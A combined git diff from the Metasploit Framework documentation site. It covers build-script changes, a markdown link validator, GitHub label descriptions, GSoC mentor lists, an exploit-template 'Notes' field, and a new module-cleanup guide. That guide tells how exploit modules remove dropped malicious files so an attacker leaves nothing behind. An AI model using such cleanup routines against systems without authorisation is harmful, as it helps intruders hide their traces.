-            var childList = parentListItem.querySelector('ul');
-            if (childList) {
-                childList.classList.toggle('open');
-            }
+            toggleChildModuleList(parentListItem)
            e.preventDefault();
        });
+    })
+
+    var toggleChildModuleList = function (parent) {
+        var list = parent.querySelector('ul');
+        if (!list) {
+            return;
+        }
+        list.classList.toggle('open');
+        // Recursively automatically open any nested lists of size 1
+        if (list.children.length === 1) {
+            toggleChildModuleList(list.children[0])
+        }
    }
 });
@@ -6,6 +6,10 @@ require 'pathname'
 # Helper class for extracting information related to Metasploit framework's stats
 #
 class MetasploitStats
+  def total_module_count
+    modules.length
+  end
+
  # @return [Hash<String, Integer>] A map of module type to the amount of modules
  def module_counts
    module_counts_by_type = modules.group_by { |mod| mod['type'].to_s }.transform_values { |mods| mods.count }.sort_by(&:first).to_h
@@ -71,11 +75,27 @@ end
 module ModuleFilter
  # @param [Array<Hash>] modules The array of Metasploit cache information
  # @return [String] The module tree HTML representation of the given modules
-  def module_tree(modules)
+  def module_tree(modules, title = 'Modules', show_controls = false)
    rendered_children = render_modules(modules)
+    controls = <<~EOF
+        <div class="module-controls">
+            <span><a href="#" data-expand-all>Expand All</a></span>
+            <span><a href="#" data-collapse-all>Collapse All</a></span>
+        </div>
+    EOF

    <<~EOF
-      <ul class="module-structure">#{rendered_children}</ul>
+      <div class="module-list">
+        #{show_controls ? controls : ''}
+
+        <ul class="module-structure">
+          <li class="folder"><a href=\"#\"><div class=\"target\">#{title}</div></a>
+            <ul class="open">
+              #{rendered_children}
+            </ul>
+          </li>
+        </ul>
+      </div>
    EOF
  end

@@ -85,7 +105,8 @@ module ModuleFilter
  # @return [String] The rendered tree HTML representation of the given modules
  def render_modules(modules)
    modules.map do |mod|
-      result = "<li#{render_child_modules?(mod) ? ' class="folder"' : ''}>#{heading_for_mod(mod)}"
+      classes = render_child_modules?(mod) ? ' class="folder"' : ''
+      result = "<li#{classes}>#{heading_for_mod(mod)}"
      if render_child_modules?(mod)
        result += "\n<ul>#{render_modules(mod[:children].sort_by { |mod| "#{render_child_modules?(mod) ? 0 : 1}-#{mod[:name]}" })}</ul>\n"
      end
@@ -126,7 +147,7 @@ Jekyll::Hooks.register :site, :after_init do |site|

    metasploit_stats = MetasploitStats.new

-    site.config['metasploit_total_module_count'] = metasploit_stats.module_counts.sum { |_type, count| count }
+    site.config['metasploit_total_module_count'] = metasploit_stats.total_module_count
    site.config['metasploit_module_counts'] = metasploit_stats.module_counts
    site.config['metasploit_nested_module_counts'] = metasploit_stats.nested_module_counts

@@ -45,14 +45,32 @@
    width: 90%;
 }

+.module-controls {
+    line-height: 0;
+    border-bottom: 1px solid #ddd;
+}
+
+.module-controls a {
+    line-height: 1;
+    padding: 0.5rem;
+    display: inline-block;
+}
+
+.module-controls span {
+    display: inline-block;
+}
+
 .module-structure a, .module-structure a:hover {
    background-image: none;
 }

-.module-structure a:hover .target {
+.module-structure a .target {
    pointer-events: none;
    display: inline-block;
    text-decoration: none;
+}
+
+.module-structure a:hover .target {
    background-image: linear-gradient(rgba(114, 83, 237, 0.45) 0%, rgba(114, 83, 237, 0.45) 100%);
    background-repeat: repeat-x;
    background-position: 0 100%;
@@ -70,6 +88,11 @@
    border-left: 1px dashed #d1d7de;
 }

+/* Never allow the top-most files/folders to be collapsed */
+.module-structure > li.folder > ul {
+    display: block;
+}
+
 .module-structure li p {
    margin: 0;
 }
@@ -3,13 +3,14 @@ require 'uri'
 require 'open3'
 require 'optparse'
 require 'did_you_mean'
+require 'kramdown'
 require_relative './navigation'

 # This build module was used to migrate the old Metasploit wiki https://github.com/rapid7/metasploit-framework/wiki into a format
 # supported by Jekyll. Jekyll was chosen as it was written in Ruby, which should reduce the barrier to entry for contributions.
 #
 # The build script took the flatlist of markdown files from the wiki, and converted them into the hierarchical folder structure
-# for nested documentation. This configuration is defiend in `navigation.rb`
+# for nested documentation. This configuration is defined in `navigation.rb`
 #
 # In the future a different site generator could be used, but it should be possible to use this build script again to migrate to a new format
 #
@@ -158,6 +159,10 @@ module Build
      @links = {}
    end

+    def syntax_errors_for(markdown)
+      MarkdownLinkSyntaxVerifier.errors_for(markdown)
+    end
+
    def extract(markdown)
      extracted_absolute_wiki_links = extract_absolute_wiki_links(markdown)
      @links = @links.merge(extracted_absolute_wiki_links)
@@ -176,7 +181,7 @@ module Build
        new_markdown.gsub!(link[:full_match], link[:replacement])
      end

-      fix_github_username_links(new_markdown)
+      new_markdown
    end

    attr_reader :links
@@ -295,74 +300,66 @@ module Build

      matched_pages.first.fetch(:new_path)
    end
+  end

-    def fix_github_username_links(content)
-      known_github_names = [
-        '@0a2940',
-        '@ChrisTuncer',
-        '@TomSellers',
-        '@asoto-r7',
-        '@busterb',
-        '@bwatters-r7',
-        '@jbarnett-r7',
-        '@jlee-r7',
-        '@jmartin-r7',
-        '@mcfakepants',
-        '@Op3n4M3',
-        '@gwillcox-r7',
-        '@red0xff',
-        '@mkienow-r7',
-        '@pbarry-r7',
-        '@schierlm',
-        '@timwr',
-        '@zerosteiner',
-        '@zeroSteiner',
-        '@harmj0y',
-      ]
-      # These tags look like Github/Twitter handles, but are actually ruby/java code snippets
-      ignored_tags = [
-        '@spid',
-        '@adf3',
-        '@LDAP-DC3',
-        '@harmj0yDescription',
-        '@phpsessid',
-        '@http_client',
-        '@abstract',
-        '@accepts_all_logins',
-        '@addresses',
-        '@aliases',
-        '@channel',
-        '@client',
-        '@dep',
-        '@handle',
-        '@instance',
-        '@param',
-        '@pid',
-        '@process',
-        '@return',
-        '@scanner',
-        '@yieldparam',
-        '@yieldreturn',
-        '@compressed',
-        '@content',
-        '@path',
-        '@sha1',
-        '@type',
-        '@git_repo_uri',
-        '@git_addr',
-        '@git_objs',
-        '@refs',
-      ]
+  # Verifies that markdown links are not relative. Instead the Github wiki flavored syntax should be used.
+  #
+  # Example bad: `[Human readable text](./some-documentation-link)`
+  # Example good: `[[Human readable text|./some-documentation-link]]`
+  class MarkdownLinkSyntaxVerifier
+    # Detects the usage of bad syntax and returns an array of detected errors
+    #
+    # @param [String] markdown The markdown
+    # @return [Array<String>] An array of human readable errors that should be resolved
+    def self.errors_for(markdown)
+      document = Kramdown::Document.new(markdown)
+      document.to_validated_wiki_page
+      warnings = document.warnings.select { |warning| warning.start_with?(Kramdown::Converter::ValidatedWikiPage::WARNING_PREFIX) }
+      warnings
+    end

-      # Replace any dangling github usernames, i.e. `@foo` - but not `[@foo](http://...)` or `email@example.com`
-      content.gsub(/(?<![\[|\w])@[\w-]+/) do |username|
-        if known_github_names.include? username
-          "[#{username}](https://www.github.com/#{username.gsub('@', '')})"
-        elsif ignored_tags.include? username
-          username
-        else
-          raise "Unexpected username: '#{username}'"
+    # Implementation detail: There doesn't seem to be a generic AST visitor pattern library for Ruby; We instead implement
+    # Kramdown's Markdown to HTML Converter API, override the link converter method, and warn on any invalid links that are identified.
+    # The {MarkdownLinkVerifier} will ignore the HTML result, and return any detected errors instead.
+    #
+    # https://kramdown.gettalong.org/rdoc/Kramdown/Converter/Html.html
+    class Kramdown::Converter::ValidatedWikiPage < Kramdown::Converter::Html
+      WARNING_PREFIX = '[WikiLinkValidation]'
+
+      def convert_a(el, indent)
+        link_href = el.attr['href']
+        if relative_link?(link_href)
+          link_text = el.children.map { |child| convert(child) }.join
+          warning "Invalid docs link syntax found on line #{el.options[:location]}: Invalid relative link #{link_href} found. Please use the syntax [[#{link_text}|#{link_href}]] instead"
        end
+
+        if absolute_docs_link?(link_href)
+          begin
+            example_path = ".#{URI.parse(link_href).path}"
+          rescue URI::InvalidURIError
+            example_path = "./path-to-markdown-file"
+          end
+
+          link_text = el.children.map { |child| convert(child) }.join
+          warning "Invalid docs link syntax found on line #{el.options[:location]}: Invalid absolute link #{link_href} found. Please use relative links instead, i.e. [[#{link_text}|#{example_path}]] instead"
+        end
+
+        super
+      end
+
+      private
+
+      def warning(text)
+        super "#{WARNING_PREFIX} #{text}"
+      end
+
+      def relative_link?(link_path)
+        !(link_path.start_with?('http:') || link_path.start_with?('https:') || link_path.start_with?('mailto:') || link_path.start_with?('#'))
+      end
+
+      # @return [TrueClass, FalseClass] True if the link is to a Metasploit docs page that isn't either the root home page or the API site, otherwise false
+      def absolute_docs_link?(link_path)
+        link_path.include?('docs.metasploit.com') && !link_path.include?('docs.metasploit.com/api') && !(link_path == 'https://docs.metasploit.com/')
      end
    end
  end
@@ -461,13 +458,25 @@ module Build

    def link_corrector_for(config)
      link_corrector = LinkCorrector.new(config)
+      errors = []
      config.each do |page|
        unless page[:path].nil?
          content = File.read(File.join(WIKI_PATH, page[:path]), encoding: Encoding::UTF_8)
+          syntax_errors = link_corrector.syntax_errors_for(content)
+          errors << { path: page[:path], messages: syntax_errors } if syntax_errors.any?
+
          link_corrector.extract(content)
        end
      end

+      if errors.any?
+        errors.each do |error|
+          $stderr.puts "[!] Error #{File.join(WIKI_PATH, error[:path])}:\n#{error[:messages].map { |message| "\t- #{message}\n" }.join}"
+        end
+
+        raise "Errors found in markdown syntax"
+      end
+
      link_corrector
    end
  end
@@ -1,17 +1,41 @@
 Maintainers can assign labels to both issues and pull requests.

+### Attic
+
+When we move something to the attic it means that what you submitted is a thing that we want but the circumstances were not quite right for landing it. Sometimes this is on us, and sometimes the contribution needs more work. We recognize that contributors work on the PRs they submit at their own pace. Take a look at the comments and review suggestions on your PR, and feel free to re-open it if and when you have time to work on it again. Don't think you'll be able to get it across the finish line? Find a community champion to do it for you.
+
+### Bug
+
+Any PR that fixes a bug or an issue that raises awareness of a bug in the framework.
+
+### Breaking Change
+
+Features that are great, but will cause breaking changes and should be deployed on a large release.
+
+### Code Quality
+
+When a PR improves code quality.
+
+### Confirmed
+
+Specifically for issues that have been confirmed by a committer.
+
 ### Docs

 Documentation changes, such as YARD markup, or README.md, or something along those lines.

-### External
+### External Modules

-Touches something in /external, or the Gemfile, or something like that.
+PRs dealing with modules run as their own process.

 ### Heartbleed

 Has to do with heartbleed. This will go away soon, but there are three outstanding still...

+### Hotness
+
+Something we're really excited about.
+
 ### Library

 Touches something in /lib.
@@ -26,20 +50,20 @@ Plugins and scripts, anything that's not otherwise defined.

 ### Module

-Touches something in /modules
+Touches something in /modules.

-### Specs
+### Needs Linting

-Has specs (an rspec test)
+The module needs additional work to pass our automated linting rules.
+
+### Needs More Information
+
+The issue lacks enough detail to replicate/resolve successfully.

 ### Newbie Friendly

 Something that's pretty easy to test or tackle.

-### attic
-
-When we move something to the attic it means that what you submitted is a thing that we want but the circumstances were not quite right for landing it. Sometimes this is on us, and sometimes the contribution needs more work. We recognize that contributors work on the PRs they submit at their own pace. Take a look at the comments and review suggestions on your PR, and feel free to re-open it if and when you have time to work on it again. Don't think you'll be able to get it across the finish line? Find a community champion to do it for you.
-
 ### Needs unique branch

 Your submitted a PR from your `master` branch.
@@ -49,4 +73,74 @@ Because of how GitHub tracks changes between branches and what got added in a pa
 git checkout -b <BRANCH_NAME>
 git push <your_fork_remote> <BRANCH_NAME>
 ```
-This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.
+This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.
+
+### Needs-docs
+
+When a module is uploaded without a corresponding documentation file, add this label in indicate docs are required
+
+### Not Stale
+
+Label to stop an issue from being auto closed.
+
+### Osx
+
+Label for any osx related work.
+
+### Payload
+
+Touches something related to a payload.
+
+### RN (Release notes)
+
+There are a series of labels that are added to all PRs when they are landed that define the release notes for the PR.
+They are denoted by the `rn-` prefix and they are important as they are used by automation to track metasploit-framework
+statistics:
+
+#### rn-enhancement
+
+Release notes for an enhancement.
+
+#### rn-fix
+
+Release notes for a fix.
+
+#### rn-modules
+
+Release notes for new or majorly enhanced modules.
+
+#### rn-no-release-notes
+
+The PR is too small or insignificant to warrant release notes.
+
+#### rn-wiki
+
+Release notes for Metasploit Framework wiki.
+
+### Stale
+
+Marks an issue as stale, to be closed if no action is taken.
+
+### Suggestion
+
+Suggestions for new functionality.
+
+### Suggestion-docs
+
+New documentation suggestions.
+
+### Suggestion-feature
+
+New feature suggestions.
+
+### Suggestion-Module
+
+New module suggestions.
+
+### Usability
+
+Usability improvements.
+
+### YARD
+
+YARD Documentation Tasks for API Documentation.
@@ -1,4 +1,4 @@
-This page lists the keys in use by [Metasploit committers][msf-committers] and
+This page lists the keys in use by [[Metasploit committers|committer-rights]] and
 can be used to verify merge commits made to <https://github.com/rapid7/metasploit-framework>.

 # Keybase.io identities
@@ -118,7 +118,6 @@ Enter passphrase: [...]

 Using `git c` and `git m` from now on will sign every commit with your `DEADBEEF` key. However, note that rebasing or cherry-picking commits will change the commit hash, and therefore, unsign the commit -- to resign the most recent, use `git c --amend`.

-[msf-committers]:https://docs.metasploit.com/docs/development/maintainers/committer-rights.html
 [pro-sharing]:https://filippo.io/on-keybase-dot-io-and-encrypted-private-key-sharing/
 [con-sharing]:https://www.tbray.org/ongoing/When/201x/2014/03/19/Keybase#p-5
 [tracking]:https://github.com/keybase/keybase-issues/issues/100
@@ -1,7 +1,7 @@
 Metasploit includes a library for leveraging .NET deserialization attacks. Using
 it within a module is very straight forward, the module author just needs to
 know two things: the gadget chain and the formatter. The library uses the same
-names for each of these values as the [YSoSerial.NET][1] project for
+names for each of these values as the [YSoSerial.NET][ysoserial] project for
 compatibility, although the Metasploit library only supports a subset of the
 functionality.

@@ -69,7 +69,7 @@ serialized = ::Msf::Util::DotNetDeserialization.generate(
 The library also has an interface available as a standalone command line tool
 which is suitable for creating payloads for single-use research purposes. This
 tool `dot_net.rb` is available in the `tools/payloads/ysoserial` directory. The
-arguments for this tool are aligned with those of [YSoSerial.NET][1], allowing
+arguments for this tool are aligned with those of [YSoSerial.NET][ysoserial], allowing
 the arguments of basic invocations to be the same. It should be noted however
 that the [supported](#support-matrix) gadgets and formatters are not the same.

@@ -109,13 +109,13 @@ generate functions while the `-f` / `--formatter` arguments maps to the
 ## Making Changes

 Adding new gadget chains and formatters involves creating a new file in the
-respective library directory: [`lib/msf/util/dot_net_deserialization`][2]. The
-"native" gadget chain type is implemented following the [MS-NRBF][3] format and
-the [Bindata][4] records as defined in [`types/`][5] subdirectory. Once the new
+respective library directory: [`lib/msf/util/dot_net_deserialization`][dot-net-deserialization-root]. The
+"native" gadget chain type is implemented following the [MS-NRBF] format and
+the [Bindata][] records as defined in [`types/`][dot-net-deserialization-types] subdirectory. Once the new
 gadget chain or formatter is implemented, it needs to be added to the main
-library file ([`dot_net_deserialization.rb`][6]).
+library file ([`dot_net_deserialization.rb`][dot-net-deserialization-rb]).

-Since serialization chain generate is deterministic, a [unit test][7] should be
+Since serialization chain generate is deterministic, a [unit test][unit-test] should be
 added for any new gadget chain to ensure that the checksum of the
 BinaryFormatter representation is consistent.

@@ -124,15 +124,13 @@ Since the .NET deserialization gadgets run operating system commands, the
 following resources can be helpful for module developers to deliver native
 payloads such as Meterpreter.

-* [How to use command stagers][8]
-* [How to use Powershell in an exploit][9]
+* [[How to use command stagers|./how-to-use-command-stagers.md]]
+* [[How to use Powershell in an exploit|./how-to-use-powershell-in-an-exploit.md]]

-[1]: https://github.com/pwntester/ysoserial.net
-[2]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization
-[3]: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/75b9fe09-be15-475f-85b8-ae7b7558cfe5
-[4]: https://github.com/dmendel/bindata
-[5]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization/types
-[6]: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/dot_net_deserialization.rb
-[7]: https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/msf/util/dot_net_deserialization_spec.rb
-[8]: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html
-[9]: https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-powershell-in-an-exploit.html
+[ysoserial]: https://github.com/pwntester/ysoserial.net
+[dot-net-deserialization-root]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization
+[MS-NRBF]: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/75b9fe09-be15-475f-85b8-ae7b7558cfe5
+[Bindata]: https://github.com/dmendel/bindata
+[dot-net-deserialization-types]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization/types
+[dot-net-deserialization-rb]: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/dot_net_deserialization.rb
+[unit-test]: https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/msf/util/dot_net_deserialization_spec.rb
@@ -1,6 +1,6 @@
 GSoC Project Ideas in no particular order.

-Mentors: @busterb, @zerosteiner, @timwr, @asoto-r7, @jmartin-r7, @pbarry-r7, @mkienow-r7, @jbarnett-r7
+Mentors: [@busterb](https://github.com/busterb), [@zerosteiner](https://github.com/zerosteiner), [@timwr](https://github.com/timwr), [@asoto-r7](https://github.com/asoto-r7), [@jmartin-r7](https://github.com/jmartin-r7), [@pbarry-r7](https://github.com/pbarry-r7), [@mkienow-r7](https://github.com/mkienow-r7), [@jbarnett-r7](https://github.com/jbarnett-r7)

 ## Enhance Metasploit Framework

@@ -1,6 +1,6 @@
 GSoC Project Ideas in no particular order. When you've picked one, take a look at [[How-to-Apply-to-GSoC]] for how to make a proposal.

-Mentors: @zerosteiner, @jmartin-r7
+Mentors: [@zerosteiner](https://github.com/zerosteiner), [@jmartin-r7](https://github.com/jmartin-r7)

 ## Enhance Metasploit Framework

@@ -1,6 +1,6 @@
 GSoC Project Ideas in no particular order. When you've picked one, take a look at [[How-to-Apply-to-GSoC]] for how to make a proposal.

-Mentors: @zerosteiner, @jmartin-r7
+Mentors: [@zerosteiner](https://github.com/zerosteiner), [@jmartin-r7](https://github.com/jmartin-r7)

 ## Enhance Metasploit Framework

@@ -1,6 +1,6 @@
 GSoC Project Ideas in no particular order. When you've picked one, take a look at [[How-to-Apply-to-GSoC]] for how to make a proposal.

-Mentors: @zerosteiner, @jmartin-r7, @gwillcox-r7
+Mentors: [@zerosteiner](https://github.com/zerosteiner), [@jmartin-r7](https://github.com/jmartin-r7), [@gwillcox-r7](https://github.com/gwillcox-r7)

 Slack Contacts: @zeroSteiner, @Op3n4M3, @gwillcox-r7 on [Metasploit Slack](https://metasploit.slack.com/)

@@ -24,7 +24,7 @@ Difficulty: 4/5

 ### LDAP Capture Capabilities

-Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.
+Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=msf_docs). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.

 Size: Medium  
 Difficulty: 3/5
@@ -58,7 +58,7 @@ Difficulty: 4/5

 Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. The main idea here is to create a visualization tool that helps users understand data that has been gathered into Metasploit during usage in some useful way. Proposals should note where the service will live, how a user will use the service, and how you will provide a maintainable and extendable consumer for the data that is exposed.

-See [Metasploit 'Goliath' Demo (msf-red)](https://www.youtube.com/watch?v=hvuy6A-ie1g&feature=youtu.be&t=176) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [Metasploit-Data-Service-Enhancements-(Goliath)](./Metasploit-Data-Service-Enhancements-Goliath)
+See [Metasploit 'Goliath' Demo (msf-red)](https://www.youtube.com/watch?v=hvuy6A-ie1g&feature=youtu.be&t=176) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [[Metasploit-Data-Service-Enhancements-(Goliath)|./Metasploit-Data-Service-Enhancements-Goliath]

 Size: Medium/Large (Depends on proposal)  
 Difficulty 3/5
@@ -1,8 +1,8 @@
 GSoC Project Ideas in no particular order. When you've picked one, take a look at [[How-to-Apply-to-GSoC]] for how to make a proposal.

-Mentors: @jmartin-r7, @gwillcox-r7
+Mentors: [@jmartin-r7](https://github.com/jmartin-r7) 

-Slack Contacts: @Op3n4M3, @gwillcox-r7 on [Metasploit Slack](https://metasploit.slack.com/)
+Slack Contacts: @Op3n4M3 on [Metasploit Slack](https://metasploit.slack.com/)

 For any questions about these projects reach out on the Metasploit Slack in the `#gsoc` channel or DM one of the mentors using the Slack contacts listed above. Note that mentors may be busy so please don't expect an immediate response, however we will endeavor to respond as soon as possible. If you'd prefer not to join Slack, you can also email `msfdev [@] metasploit [dot] com` and we will respond to your questions there if email is preferable.

@@ -17,18 +17,11 @@ Difficulty: 4/5

 ### LDAP Capture Capabilities

-Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.
+Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=msf_docs). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.

 Size: Medium  
 Difficulty: 3/5

-### Enhanced LDAP Query & Collection
-
-When preforming security assessment on a network with centralized login such as LDAP or Active Directory these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system by utilizing tooling such as `Sharphound` or by leveraging SMB services via the `secrets_dump` module, these methods are somewhat indirect. A network base capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory providing capabilities similar to the existing `requests` plugin could enable users search for valuable information in these services without the need to compromise a target or interact with a secondary service. 
-
-Size: Medium/Large (Depends on proposal)  
-Difficulty: 3/5
-
 ### Improving post-exploit API to be more consistent, work smoothly across session types

 The Metasploit post-exploitation API is intended to provide a unified interface between different Meterpreter, shell, PowerShell, mainframe, and other session types. However, there are areas where the implementation is not consistent, and could use improvements:
@@ -53,7 +46,7 @@ Enhance existing Metasploit Goliath dashboard that allows observation of an acti

 See [Metasploit 'Goliath' Demo (msf-red)](https://www.youtube.com/watch?v=hvuy6A-ie1g&feature=youtu.be&t=176) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [[Metasploit-Data-Service-Enhancements-(Goliath)|./Metasploit-Data-Service-Enhancements-Goliath]]

-Size: Medium/Large (Depends on proposal)  
+Size: Medium/Large (Depends on proposal)
 Difficulty 3/5

 ## Submit your own
@@ -69,7 +69,12 @@ class MetasploitModule < Msf::Exploit::Remote
        },
        'Privileged' => false,
        'DisclosureDate' => '',
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        },
      )
    )
  end
@@ -99,7 +104,14 @@ end

 * **Payloads** - The Payloads field specifies how the payload should be encoded and generated. You can specify: `Space`, `SaveRegisters`, `Prepend`, `PrependEncoder`, `BadChars`, `Append`, `AppendEncoder`, `MaxNops`, `MinNops`, `Encoder`, `Nop`, `EncoderType`, `EncoderOptions`, `ExtendedOptions`, `EncoderDontFallThrough`.

-**DisclosureDate** - The DisclosureDate is about when the vulnerability was disclosed in public, in the format of: "M D Y". For example: "Apr 04 2014"
+* **DisclosureDate** - The DisclosureDate is about when the vulnerability was disclosed in public, in the format of: "M D Y". For example: "Apr 04 2014"
+
+* **Notes** - The Notes field is a hash always containing three keys. The value of each key is an array of constants. The list of available constants can be found in the [[Definition of Module Reliability Side Effects and Stability|./Definition-of-Module-Reliability-Side-Effects-and-Stability.md]]. The key should be present even if the array is empty.
+
+    * **Stability** - The Stability field describes how the exploit affects the system it's being run on, ex: `CRASH_SAFE`, `CRASH_OS_DOWN`
+    * **Reliability** - The Reliability field describes how reliable the session is that gets returned by the exploit, ex: `REPEATABLE_SESSION`, `UNRELIABLE_SESSION`
+    * **SideEffects** - The SideEffects field describes the side effects cause by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.
+

 Your exploit should also have a `check` method to support the check command, but this is optional in case it's not possible.

@@ -33,7 +33,6 @@ Are you anxious to get your [[Metasploit Development Environment|./dev/Setting-U
 - [[Exploit Ranking]]
 - [[Module Reference Identifiers]]
 - [[How to check Microsoft patch levels for your exploit]]
- [[How to clean up files using FileDropper]]
 - [[How to deprecate a Metasploit module]]
 - [[How to do reporting or store data in module development]]
 - [[How to log in Metasploit]]
@@ -65,6 +64,7 @@ Are you anxious to get your [[Metasploit Development Environment|./dev/Setting-U
 - [[Using ReflectiveDll Injection]]
 - [[Oracle Usage]]
 - [[Definition of Module Reliability, Side Effects, and Stability|./Definition-of-Module-Reliability-Side-Effects-and-Stability.md]]
+- [[How to cleanup after module execution]]

 # Metasploit Payloads #

@@ -1,38 +0,0 @@
-## On this page
-
-* [Examples](#examples)
-* [Reference](#reference)
-
-In some exploitation scenarios such as local privilege escalation, command execution, write privilege attacks, SQL Injections, etc, it is very likely that you have to upload one or more malicious files in order to gain control of the target machine. Well, a smart attacker shouldn't leave anything behind, so if a module needs to drop something onto the file system, it's important to remove it right after the purpose is served. And that is why we created the FileDropper mixin.
-
-## Examples
-
-The FileDropper mixin is a file manager that allows you to keep track of files, and then delete them when a session is created. To use it, first include the mixin:
-
-```ruby
-include Msf::Exploit::FileDropper
-```
-
-Next, tell the FileDropper mixin where the file is going to be after a session is created by using the ```register_file_for_cleanup``` method. Each file name should either be a full path or relative to the current working directory of the session. For example, if I want to upload a payload to the target machine's remote path: ```C:\Windows\System32\payload.exe```, then my statement can be:
-
-```ruby
-register_file_for_cleanup("C:\\Windows\\System32\\payload.exe")
-```
-
-If my session's current directory is already in ```C:\Windows\System32\```, then you can:
-
-```ruby
-register_file_for_cleanup("payload.exe")
-```
-
-If you wish to register multiple files, you can also provide the file names as arguments:
-
-```ruby
-register_file_for_cleanup("file_1.vbs", "file_2.exe", "file_1.conf")
-```
-
-Note that if your exploit module uses ```on_new_session```, you are actually overriding FileDropper's ```on_new_session```.
-
-## Reference
-
- <https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/file_dropper.rb>
@@ -0,0 +1,86 @@
+## On this page
+
+* [Cleanup method](#cleanup-method)
+* [FileDropper Mixin](#filedropper-mixin)
+
+## Cleanup method
+
+Metasploit has a handy `cleanup` method that is always called when the module terminates, whether it is successful or not. This method can be overridden by any modules to add their own cleanup routines. For example, this might be useful to put some files back on the target after the module had deleted them. Another scenario would be to restore the settings in a web application that were modified by the exploit. This is the right place to clean things up.
+
+Framework itself implements this method to disconnect connections, call the handler cleanup routines, etc. Some other mixins, such as the `Msf::Exploit::FileDropper` (see the next [section](#filedropper-mixin)) or `Msf::Exploit::Remote::Kerberos::Client`, override this method to add their own cleanup code. It is extremely important to **always** call `super` in your `cleanup` method to make sure Framework and any other mixins clean up themself properly.
+
+Here is an example that restores a configuration file after being deleted by the module:
+```ruby
+def cleanup
+  unless self.conf_content.nil?
+    write_file(self.conf_file, self.conf_content)
+  end
+
+  super
+end
+```
+
+Here is another example of a `cleanup` method that deletes a temporary Git repository:
+```ruby
+def cleanup
+  super
+  return unless need_cleanup?
+
+  print_status('Cleaning up')
+  uri = normalize_uri(datastore['USERNAME'], self.repo_name, '/settings')
+  csrf = get_csrf(uri)
+  res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], uri),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        _csrf: csrf,
+        action: 'delete',
+        repo_name: self.repo_name
+      }
+  })
+
+  unless res
+    fail_with(Failure::Unreachable, 'Unable to reach the settings page')
+  end
+
+  unless res.code == 302
+    fail_with(Failure::UnexpectedReply, 'Delete repository failure')
+  end
+
+  print_status("Repository #{self.repo_name} deleted.")
+
+  nil
+end
+```
+
+## FileDropper Mixin
+
+In some exploitation scenarios such as local privilege escalation, command execution, write privilege attacks, SQL Injections, etc, it is very likely that you have to upload one or more malicious files in order to gain control of the target machine. Well, a smart attacker shouldn't leave anything behind, so if a module needs to drop something onto the file system, it's important to remove it right after the purpose is served. And that is why we created the FileDropper mixin.
+
